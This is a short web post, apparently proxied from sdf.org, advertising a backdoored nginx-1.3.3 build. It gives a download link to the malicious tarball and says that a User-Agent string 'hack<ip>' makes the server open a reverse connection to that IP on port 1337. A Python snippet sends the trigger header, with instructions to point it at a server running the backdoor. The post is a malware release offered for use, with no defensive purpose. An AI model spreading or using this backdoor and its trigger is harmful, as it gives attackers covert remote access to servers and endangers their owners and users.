A Simple Backdoored Version of nginx-1.3.3

Here a simple backdoored version of nginx-1.3.3 that worked based on browser's user agent. Whenever it receives a http user agent string : "hackip_address" it will send a
back connect to specified ip address on port 1337.
http://www.cr0security.com/backdoored/nginx-1.3.3-malicious.tgz

example of usage we may use this simple python code:

=========
#!/usr/bin/python
import urllib2
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'hack127.0.0.1')]
response = opener.open('http://localhost')
=========

change 127.0.0.1 suits to ip address and change the localhost string to server's host that already installed the backdoored version of nginx.

You are viewing proxied material from sdf.org. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.